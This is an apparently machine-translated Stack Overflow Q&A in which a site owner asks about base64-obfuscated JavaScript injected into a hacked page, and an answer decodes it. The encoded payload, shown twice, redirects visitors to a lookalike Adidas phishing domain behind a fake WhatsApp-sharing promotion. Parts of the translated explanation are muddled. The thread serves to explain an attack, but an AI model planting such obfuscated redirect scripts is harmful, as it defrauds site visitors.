javascript - 解码奇怪的 JavaScript 代码

标签 javascript

我对解码和编码不太了解,但我在我的网站上发现了这个(它被黑客攻击,有人接管了我网站中的一个页面)。我分析了该页面,但无法阅读:

<script type="text/javascript">
eval(atob("dmFyIGMgPSAwOwokKGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpIHsKICAgICQoIiNiMSIpLm9uKCdjbGljaycsIGZ1bmN0aW9uKCkgewogICAgICAgICsrYzsKICAgICAgICBpZiAoYyA+IDE1KSB7CiAgICAgICAgICAgICQodGhpcykuYXR0cih7CiAgICAgICAgICAgICAgICBocmVmOiAiaHR0cDovL3d3dy54bi0tYWRkYXMtbzRhLmRlL2ZpbmFsLmh0bWwiLAogICAgICAgICAgICAgICAgdGFyZ2V0OiAiX3NlbGYiCiAgICAgICAgICAgIH0pOwogICAgICAgIH0KICAgIH0pOwogICAgJCgiI2IyIikub24oJ2NsaWNrJywgZnVuY3Rpb24oKSB7CiAgICAgICAgaWYgKGMgPiAyMCkgd2luZG93LmxvY2F0aW9uID0gImh0dHA6Ly93d3cueG4tLWFkZGFzLW80YS5kZS9maW5hbC5odG1sIjsKICAgICAgICBlbHNlIHdpbmRvdy5hbGVydCgiRGVlbCBhYW4gMjAgdmFuIGplIHZyaWVuZGVuIG92ZXIgV2hhdHNBcHAgZGUgQWRpZGFzIHByb21vdGllIVxuXG4gSmUgbW9ldCBkZWxlbiAiICsgYyk7CiAgICB9KTsKfSk7"));
</script>

这是什么意思?我怎样才能阅读它?

最佳答案

这是一段 base64 编码的代码,在运行时进行评估。

您的代码

<script type="text/javascript">
eval(atob("dmFyIGMgPSAwOwokKGRvY3VtZW50KS5yZWFkeShmdW5jdGlvbigpIHsKICAgICQoIiNiMSIpLm9uKCdjbGljaycsIGZ1bmN0aW9uKCkgewogICAgICAgICsrYzsKICAgICAgICBpZiAoYyA+IDE1KSB7CiAgICAgICAgICAgICQodGhpcykuYXR0cih7CiAgICAgICAgICAgICAgICBocmVmOiAiaHR0cDovL3d3dy54bi0tYWRkYXMtbzRhLmRlL2ZpbmFsLmh0bWwiLAogICAgICAgICAgICAgICAgdGFyZ2V0OiAiX3NlbGYiCiAgICAgICAgICAgIH0pOwogICAgICAgIH0KICAgIH0pOwogICAgJCgiI2IyIikub24oJ2NsaWNrJywgZnVuY3Rpb24oKSB7CiAgICAgICAgaWYgKGMgPiAyMCkgd2luZG93LmxvY2F0aW9uID0gImh0dHA6Ly93d3cueG4tLWFkZGFzLW80YS5kZS9maW5hbC5odG1sIjsKICAgICAgICBlbHNlIHdpbmRvdy5hbGVydCgiRGVlbCBhYW4gMjAgdmFuIGplIHZyaWVuZGVuIG92ZXIgV2hhdHNBcHAgZGUgQWRpZGFzIHByb21vdGllIVxuXG4gSmUgbW9ldCBkZWxlbiAiICsgYyk7CiAgICB9KTsKfSk7"));
</script>

解码步骤(简单)

  1. 转到base63decode.org
  2. 复制 atob block 内的代码。
  3. 将其粘贴到编码字符串 block 中并按解码。

解码后的代码

<script type="text/javascript">
eval(var c = 0;
$(document).ready(function() {
    $("#b1").on('click', function() {
        ++c;
        if (c > 15) {
            $(this).attr({
                href: "[ a phishing URL -- removed ]",
                target: "_self"
            });
        }
    });
    $("#b2").on('click', function() {
        if (c > 20) window.location = "[ a phishing URL -- removed ]";
        else window.alert("Deel aan 20 van je vrienden over WhatsApp de Adidas promotie!\n\n Je moet delen " + c);
    });
}););
</script>

这是做什么的

第一个代码正在被解码,并且在捕获具有唯一 ID b1 和 b2 的两个按钮上发生的事件之后,并根据点击计数做出决定,其中位置正在更改或使用网络钓鱼网站条件创建新选项卡单击 15 次后,您将点击此按钮,如果出现任何问题,您将导航到此 URL,然后单击 20 次后,将使用此 URL 生成一个新窗口。

关于javascript - 解码奇怪的 JavaScript 代码,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/50457457/

上一篇:javascript - 在jquery中获取动态添加的复选框的值

下一篇:javascript - 带有地理围栏的 html5 地理定位 API

相关文章:

javascript - 单击事件不适用于使用 JQuery 导入文件

javascript - 为在 Canvas 上绘制的图像添加碰撞检测

javascript - react : timeout call to Firebase

javascript - 需要客户端 JavaScript 中的 PayPal PDT 示例代码

javascript - 使用 CSS 动画和 javascript 构建自定义 slider

javascript - div 中的 Html 表格导出到 excel

javascript - 使用 Ajax 请求加载 php 循环(或类似的 Javascript 解决方案)

javascript - D3.js 在指定 nodeSize 时获取树的渲染尺寸

javascript - jQuery - 在 slideDown 上滚动到 div 的底部

javascript - 拆分字符串并将所有值传递给函数

©2024 IT工具网  联系我们